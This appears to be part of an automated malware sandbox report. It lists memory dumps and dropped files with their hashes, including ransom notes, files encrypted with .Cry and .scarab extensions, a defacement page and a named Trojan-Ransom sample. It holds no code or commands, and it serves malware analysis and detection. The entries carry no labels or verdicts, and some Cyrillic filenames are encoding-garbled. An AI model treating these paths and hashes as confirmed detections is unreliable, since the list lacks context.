memory/6976-1604-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1084-1567-0x0000000005E40000-0x0000000005E4A000-memory.dmp

memory/3684-1581-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/6872-1557-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1272-1545-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/4676-1524-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1020-1653-0x0000000007590000-0x0000000007626000-memory.dmp

C:\Program Files (x86)\gjcsw\dwiu.exe

MD5 90ce4f583a9afad81fc28345f35d1d3c
SHA1 0f045f14f8f95aad3e8ac0b427168d5ea472abd0
SHA256 9c296fd607d7f379c55da84efdd6f67da8191a1c4998fc321e00b7a8b21498c1
SHA512 be7c7e7e0fec3d0f5b68df3d4be93b8685770f3c0b3702e3589e330ebb647ced1d0f925c30e0a3de54db08a0b235dfc939c63e7db3b9b3de48a48079c3d54cf0

memory/8200-1697-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1056-1691-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1020-1690-0x00000000074C0000-0x00000000074D1000-memory.dmp

memory/6964-1680-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/7104-1655-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/6888-1665-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1064-1702-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1700-1703-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/4080-1716-0x0000000072FF0000-0x000000007303C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe

MD5 0faf019ee1150059772fb172fda57826
SHA1 bc86bdc72d3389fcb294bfce906b1c72a834b28a
SHA256 e0126b5e7f1b4576f41f6ce6d00f9b41e15b5ba88832480a6b53e4fab3f71fc1
SHA512 8cf7ce037dea81858a11d8dcecbf3102a28f3886356f4f4f14244d7acc44af086cf19ab3f214ce22d18996cb91b2bc04d3e9cd97a1f15ae2ea015898e63849f0

memory/1712-1746-0x0000000000400000-0x00000000004AA000-memory.dmp

memory/1744-1745-0x0000000007E40000-0x0000000007E4E000-memory.dmp

memory/1084-1761-0x00000000073E0000-0x00000000073F4000-memory.dmp

F:\GET_YOUR_FILES_BACK.txt

MD5 d1a36f655ac58f415202a5f3a7652582
SHA1 1525e6c2cc638d7bb803e4c91a9e5d6557c1b48c
SHA256 529f8774f1c1530308163771ea13a57b86ee8c36860eeedc0107ba1209b1b6ff
SHA512 46a2a91f851e478de76ddda9f6db2d0d9ba0c9872d7f0f2498d4f5348f3246a05a235b3680e7a46062a4e4f9bb6ef875d83a3c385689193450f54bd6adc8d767

memory/1020-1771-0x0000000007540000-0x000000000755A000-memory.dmp

memory/1084-1776-0x0000000007410000-0x0000000007418000-memory.dmp

memory/5656-1783-0x0000000000400000-0x00000000015FA000-memory.dmp

memory/3944-1811-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

MD5 70f04fe4c6ee87246ad70fe32a42681b
SHA1 5a344da238f3ea25cb771641f98bef8b8d7113ec
SHA256 6791595f76525e4a5541279aa9e5b6e74c1708061036718edccb3e6ddd72cc04
SHA512 de0c4eb144088a7d6adb97a76c9e6eb414a1f5768dfa69798981193571b2bb363fbf5bf02aacbaa88c4c5b1b09999a60d4795313b3b2b3e63d4be4e55b79c69c

memory/7924-1865-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/6852-1862-0x00000000000D0000-0x00000000000D6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 c58d69d46257d9fa3f9af4c40b17b31c
SHA1 17a30468638acc993b3e11365fbc35055642fddf
SHA256 82d4ba2f2f35391e47fab9e4067b18746bfaf8db1b8a34287926ce9af080e7d5
SHA512 d56c44f8069d93b4c0babe37c76f074595e5bccf6a790e2437b4a9f3fdec34630071e1579aaed4b78d7d361d5487696cdb2f07e74ef2159aa9e5afc855ebd676

memory/9932-1992-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Explorer\Launch_U3.exe

MD5 52fb50725cda2c3672b5b39e4293e5f4
SHA1 910a6ebb8fac35ae61c48cd5ad5931fab3055725
SHA256 fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169
SHA512 32ae601f086009ed3110d6febc4f4f51fcaa19c0b15bb49876aad1eed8c45d8763762465dc293eb80e38bae3df0baecc139e7e2b474506de53573584b00b05c0

memory/1712-2162-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 2a67b0bea4ff3fa5570125f39237f6f8
SHA1 f586eb5d137d5e8dd3fbdc3cf11b49510c4be1de
SHA256 13bc9f7c26221560c737d982f90965bf1b941418a37bb1ba7530e9ce6ed87425
SHA512 b2fb796f6617471a8bd3366231790035df55d6e43d1b65de1402bb650dba8aa806c3065aef52fc117458c9d7b2ebfe3352aa8783883b825d997d6d92cd68ac59

C:\Explorer\Folder.htt

MD5 f7374b9d4919ddd01960f3b0b5ba9abc
SHA1 7d31360c9156b56f8d067d1113e0dfe8c4459881
SHA256 1a8278f742de759e24415028a01b9e2a794cfaeeb1af2a28e55866b64594c374
SHA512 140a3f3e1ba55aed832914422a654baed852c74b4102bfceb4bd879f4ed506b31735adc24fdcaf9f46e60b8366c2c179e5be420eff8614d51f58cfe167633b6a

memory/7708-2324-0x0000000000400000-0x0000000000537000-memory.dmp

F:\Depkominfo_Didefaced.htm

MD5 7605e69eb825f91b53b617d3560794f9
SHA1 05834aa5ca4c4459b9ffb9f4f2827dc50181a48f
SHA256 30aa71789cdba1395de5f1c0e38ab2c225e496172dc6d1a8d5547b2fbedbfa19
SHA512 fe5e535fe7c3728b714c83659f61aa8878edd0c8b935beb56e0a425ca4f62db8e08593011e031d6e046075c10424458a8745ddffe41f64786fe0beb27a7d6edc

F:\desktop.ini

MD5 27fc937830aba762026cbd58a67b555f
SHA1 69ada2ba80a6c1a56721f44f4049942d5d5a5d08
SHA256 6270b211fce6dd684b04c7036cdd758ca7ca760c101d1c7811a659fa16d54e8b
SHA512 66a3900d73233147cc0022458d5dd863df02eea276055005534f6751c664b2262a9ad29c3068044efc6e550d9c939f7d1ba16ad6d731e37c28fcc2cec291663e

memory/7592-2440-0x0000000000400000-0x0000000000537000-memory.dmp

memory/7592-2442-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2488-2462-0x0000019F67150000-0x0000019F67205000-memory.dmp

memory/2488-2461-0x0000019F67130000-0x0000019F6714C000-memory.dmp

memory/7592-2493-0x0000000000400000-0x0000000000537000-memory.dmp

memory/7592-2494-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2488-2497-0x0000019F67120000-0x0000019F6712A000-memory.dmp

memory/2488-2498-0x0000019F67580000-0x0000019F6759C000-memory.dmp

memory/9932-2574-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 7bf1e0990ad773effef527084ebe9495
SHA1 7c32c0df5581573e8e92b6c00b04caa1eafae393
SHA256 35b0e14e12b3abf4f42d7ca1e688efb62efcf0004958c8643d1e75819291cb92
SHA512 b6a59b14bb287beced2f874237b101bdf6b70fcf996c68b162f4abfd85b77c51e4dfacf5c9abca3e1aeb885815e6eb3f737286bd688e999b3309d91c796d7a78

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\я

MD5 93b885adfe0da089cdf634904fd59f71
SHA1 5ba93c9db0cff93f52b521d7420e43f6eda2784f
SHA256 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d
SHA512 b8244d028981d693af7b456af8efa4cad63d282e19ff14942c246e50d9351d22704a802a71c3580b6370de4ceb293c324a8423342557d4e5c38438f0e36910ee

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 e58cc7e3da806301fff29f0a9cbc8963
SHA1 c7b9d7d0a24ffe6b15adb2586a301631b6ec240b
SHA256 bcf92e12dab4f646ced5707c092f1dcd499a1fd2bde92286eb2d28c7e60b2d99
SHA512 8d94fef07a1e322e038a22100761b4c992c34c16c6afde08c1e6c07741fedc2e59263c605f35e7fe389e95c5949d34b73abcbea1f974caf8699ccf7fd08c9e20

memory/2488-2721-0x0000019F67210000-0x0000019F6721A000-memory.dmp

memory/10128-2861-0x000001B048660000-0x000001B04867A000-memory.dmp

memory/10128-2863-0x000001B0484B0000-0x000001B0484B8000-memory.dmp

memory/10128-2865-0x000001B0484E0000-0x000001B0484E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wujek.exe

MD5 a885cd9d0349b21032a300ea7d7e70e6
SHA1 7e46d45912e99227d10d40690ef3fb602757f312
SHA256 2992af5a15c078dd32cbfb35c0fefee513cc6bbe527d6692383e1f80010ab451
SHA512 89c7c8a2a656cca2fc626706ec50be426999605243381ec2f628ec67e2eaf727abe9b86993c6356562e2573552233b47590d6520e0140d03e62d8d723069194d

memory/10128-2898-0x000001B048640000-0x000001B04864A000-memory.dmp

memory/9260-2905-0x0000000140000000-0x0000000140054000-memory.dmp

memory/5656-2906-0x0000000000400000-0x00000000015FA000-memory.dmp

memory/9260-2910-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2926-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2925-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2923-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2921-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2918-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2917-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2915-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2913-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2912-0x0000000140000000-0x0000000140054000-memory.dmp

memory/9260-2911-0x0000000140000000-0x0000000140054000-memory.dmp

C:\Explorer\msvbvm60.dll

MD5 25f62c02619174b35851b0e0455b3d94
SHA1 4e8ee85157f1769f6e3f61c0acbe59072209da71
SHA256 898288bd3b21d0e7d5f406df2e0b69a5bbfa4f241baf29a2cdf8a3cf4d4619f2
SHA512 f4529fd9eca4e4696f7f06874866ff98a1447a9b0d3a20ef0de54d4d694e2497fd39c452f73fab9b8a02962a7b2b88d1e85f6e35c7cbcb9555003c6828bebc3a

memory/768-2982-0x0000000000400000-0x000000000054B000-memory.dmp

memory/428-2983-0x0000000000A30000-0x0000000000A59000-memory.dmp

memory/4236-2994-0x0000000000400000-0x000000000054B000-memory.dmp

F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\UWBIN-DECRYPT.txt

MD5 5b966815cd9319c7d80b44f6782c4b3b
SHA1 073559583630a192a75cc500ed670c2aad1f59a5
SHA256 c0002d66b1714f0978f97fe3e361a18308838daa3ed0173af0d344a94b9e8713
SHA512 412a420540e0896b0e57f8378146415b8f0292975e21e2204324c55b3a3eee8a0d484db564457bce635c48fb68b091b89bb277383c3ba65d91007cae85555047

memory/4716-3330-0x0000000000400000-0x000000000042E000-memory.dmp

memory/4716-3351-0x0000000000400000-0x000000000042E000-memory.dmp

memory/5772-3518-0x0000000000400000-0x0000000000448000-memory.dmp

C:\Users\Admin\UWBIN-DECRYPT.txt.Cry

MD5 b2d3c559b808899d22d8530d9920999e
SHA1 e3645c66eaf21f1f5b49009d49737e8aa348fd53
SHA256 485cb0e4a30181b49699e64b9769cd15c49b5781c12392ac81aff2cb7d9ecd19
SHA512 3ed7aea0c9f17b0fc683779bc5160332ef19eaa2ea632a628dffee55e36feb5525393b31a366cfadd2ccec105d0c82f8b2de5a5e4ebc5d7ae6a047a277c90f68

C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.Cry

MD5 549cf1bea4449e411f52a7033e17a856
SHA1 39e1b2dc8acd0a70a94c29bdbde7bdbaaa9003fc
SHA256 8eccbd489e51d73cd821f73ce7935fdcd5f06d7657faa06cf34c3930dbc1c7de
SHA512 647d1ea080d3e38cf249178b49e16fffb1762708b9350338823998e0328e1728f0fba5ac9c777b3354aa97528a4fe806c3704f7874b348f8ceb040591c0935ca

C:\Explorer\Roy.bmp

MD5 4de286f5923036648db750d58ba496e8
SHA1 0252d5d6c7a3b7dfa71fca4b30a53522fd7c6f67
SHA256 eb79555170611879e79b4cdba59bdf679e63df9d7927d01354e5cf859274c58c
SHA512 069daaa01a04add11a9e5fc0988b5d42e6ad50011fa148df41ffb3a905ffc170ab65ba66f4ad921306503d8792dd192c173c532232fc7ef146c09aa76ddf548f

memory/7776-4043-0x0000000000F30000-0x0000000000FB6000-memory.dmp

memory/428-4536-0x0000000000A30000-0x0000000000A59000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 26a6ee1a8336494a92f2f49d1c8d8f85
SHA1 e38975849422ed5f9030911abdaac10d62ba0d6b
SHA256 a70bc89fbbdb31a9fc29e8f6881c492d3066e87d616197a850a46c12cc4ddc56
SHA512 a8bac09435fb99cc20c3b656b83d8edf29c6ce0af0c5dca1501cf101c819145f99f646540f0ed7a17fdbdf14ac09959722a15c3f80749afc8e651867550b56b7

memory/5772-4596-0x0000000000400000-0x0000000000448000-memory.dmp

memory/7776-4628-0x0000000000F30000-0x0000000000FB6000-memory.dmp

memory/2204-4566-0x0000000000400000-0x000000000087C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mycyc.exe

MD5 39d7a3bbd4b7637301168b5e37696b24
SHA1 d23f50e466124b435f4b64723e5f56278ce8785f
SHA256 4887686d424d07f697d15cc4e004db281306f3eb06702944f789d39e78c3c696
SHA512 b5df76879352a376e8c4189da57b461dac1aaa0997739d17059384eaa075b3a00446a93aab4556fdbb9e7d3b7cab49d4cd4de3844f7c7ecb09f23fbbbc267e5d

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Gimemo.ckxo-132cb14877a7bd9e3c69416d903bfda7b984d7a641df992d66a8ccb36bd12dd0.exe.Cry

MD5 7fc5b3c4c40e9221bc584fb77cc856a7
SHA1 b454af994539b3318d835240076adf8967d9e72f
SHA256 45bec3fde1054bfca838c6863db25150cfcd32d2020f7b6dc7ab91cc8b2ddb74
SHA512 8f704236662055b4c179a6ab874e2c633e8bc3eac6738b59472dd8e84fb7977ec56201d1ff796e4817751fd210e70f72721e54bf1fbbbe724dfca89ddd093d95

memory/2204-5800-0x0000000000400000-0x000000000087C000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 007a97e8eb574086f2e5302009c61561
SHA1 f510ba756ff123eda1808120d350ac2032f4f043
SHA256 8d8bb216197f909cf115b6e7d09e17db38c63b0c5e9f2039d78c260446b17429
SHA512 96f68f9a7b21e7b5fda6d1cf0372898897c7d96915f3b55be3520135934646289befce85ddc870e2e4e6f8ad57d3459984ecf8e2da4a4cc4b7679f4169437161

C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

MD5 a2f259ceb892d3b0d1d121997c8927e3
SHA1 6e0a7239822b8d365d690a314f231286355f6cc6
SHA256 ab01a333f38605cbcebd80e0a84ffae2803a9b4f6bebb1e9f773e949a87cb420
SHA512 5ae1b60390c94c9e79d3b500a55b775d82556e599963d533170b9f35ad5cfa2df1b7d24de1890acf8e1e2c356830396091d46632dbc6ee43a7d042d4facb5dad

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 435584b9c38ae62919e5de094f2fd74e
SHA1 3689a8a050b2382195a84684bb61aadd00aa0af1
SHA256 97e6251bcde950071d71a5322b2a47debda5f9ffe52069c2d463e6b28b7f55b4
SHA512 ef5ca46dc8dc1d8b635767f3c2aa847d9f3c557cac1f54179920212fbb5e1d5f26706c937b12cffec395d67ca81f5d9d66cda8009dbe7548ce3209956c6d3d53

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll

MD5 de69a7e06ab9e8ae209c9339e255b096
SHA1 74e1440294839040a2978d0c67dde59106144d68
SHA256 7e5d223bda07156799d197b0fdc130afc589ec64f589dbe9f18b189f6763586e
SHA512 5a6dbc64ba0ae5aa022fc040f324312ad1a364b624d1542d2a903133bcf017f22e82bea04b68b44628e1c00c151647ae32beefced9c841696a81f60e17636905

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 74ecfa0cd47f1d7badbfce75d3811e94
SHA1 30240dae184cedde6b5a84094f93170dc76aa28b
SHA256 3e1788e50f0f1ec18224154dba5339cc10050be301a661d2a8873c93d0061fc7
SHA512 f4b74c6ddc8e9b8d2b4928dabe53466f5480390d7fd67937a5b89ce69f86f01d2c63d1316d96196e90bc255ece96027ec6088b52eabcfee3b6ea1e04a9ef9628

memory/6052-16411-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT.scarab

MD5 0446b3594bcd03b44085443eb0647966
SHA1 b8068b2cec577d7d34d51a42d8a8d438dbf08ead
SHA256 8ddd47f2b59bbd67bd1e1f977496a475878a41d83792c5b24728c1c1a60f93dc
SHA512 11c967eb8c4bb457799448708ed96f579d8866b6b51de2d84ce6eca09aaf0b829e90df3316e51ccce48cf8860ae446fcca3c9309356f5dd9004fa5062f3f2b27

memory/8212-18754-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT.scarab

MD5 c44e7bbce46a8ffae6d7f7f3b1782c40
SHA1 7790b0f196f659e6eb0c1baccd9e76c1bd0aa13a
SHA256 adbc3c215c46550cb1665a4371db5655ab37aca9e3c888e5533aff001a26209e
SHA512 5cfeb3ddd532c4302a18727a055a958acc244b91ade8360cf9b43a027ea8fcac6f62c54e9956090e342e8d4dd40f39aa372000b4d9e6bf468327d94396ed1535

memory/5652-20811-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\D3DCompiler_47_cor3.dll

MD5 7e57db14e3c62868f8b43df0a205da7a
SHA1 2691cf1558b7db4db44a25be2ed89a899d4ff81c
SHA256 b2da1f32c4100cbd337050256871899968275172eae686e71eddb9c5e53da9bb
SHA512 358b97145bc71b1fcf116facf92a226e92534dc6fc80d141c1f0a2013413fdbe25a93dded27b48de2c947777a754760440805b75cef74faa325916b841bb3af4

C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\vcruntime140_cor3.dll

MD5 8380e03a2f76cd2a865d57492dbac79e
SHA1 42dccc6bdecffe39a469f67cf557604423aade2b
SHA256 988d51693df19018da953a5ac70c7c71fa65b95c47374cd209aa0e8dd0c03f02
SHA512 c52603f8609dc4158f482f6275baf26393a07465f506b0b3e00c5a13cab3c45c2b86091b5ed8ecd9e705f3b5c87b0930f264a63c10c5a91e210a816658300ef3

C:\Users\Admin\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 baf24d3f3b8b8bd39a0c50256a1e1342
SHA1 13eef4fa8aaf8d5ff8b724f5237a865f55d065b7
SHA256 64eb5731f2d4fe7eea69d87233748333055fe6dbd0de993fcd989a4296da94d9
SHA512 829179faf2feaccc2e1b1e38f843295e82e632b7f4f4a9e72fc0c1651577e633b2fa66f1bba1f20e0c7b186c820916c99e1af240306af0d5c4c20d8d958e79d1

C:\Users\Admin\Desktop\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 4bcda436387b556c639287959f20125b
SHA1 03ee11205fb1fac22ec03cfe17e5b0ac9ec668e4
SHA256 31051290a1a12f786ac226848d80c74170da6c50f647baf9446dbac4bd53fc6c
SHA512 e139f92562768c5fa2cf710f44066c79101af6a2580b82167f0cbc0764642ff8525136399c965125611f2e780c270219bc782688ef17cbbeecc7d1f70bd1d63d

C:\Users\Admin\Desktop\00484\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 54a54100cd7b0918bb9899b8d8a6ccea
SHA1 c86cf292f7360822028c6e9a7989b397d86caa9d
SHA256 9e1af901e98279e74fda73025db626b4a4d96bbd108f196699898f01205a235f
SHA512 76142bdfa2d33ce1ec6c59e9d04bc64073e497452b8ce6b34d15f5f5818cbbbbc17e85ee1a9e5ad057233f99255c5a959b344de073407d64ad1d91aa40018809

C:\Users\Admin\Downloads\Èíñòðóêöèÿ ïî ðàñøèôðîâêå.TXT

MD5 83f1fa3a4a1612364bd15db95d01d4df
SHA1 2c63cacce279e78cb416770aab34b61b2909b6cd
SHA256 ad7254983aeabe8cdd2b055afdb58c42882d829f362508e835608060cac458d1
SHA512 29ab8a5bfad6b9b1623cc61f9c663b575824d23abbb2d4fbd29fef7abecdea1030e72ae23dd5b8df5be1e68ba030b6776e0bf8c35ef6bca9affe6dd291174932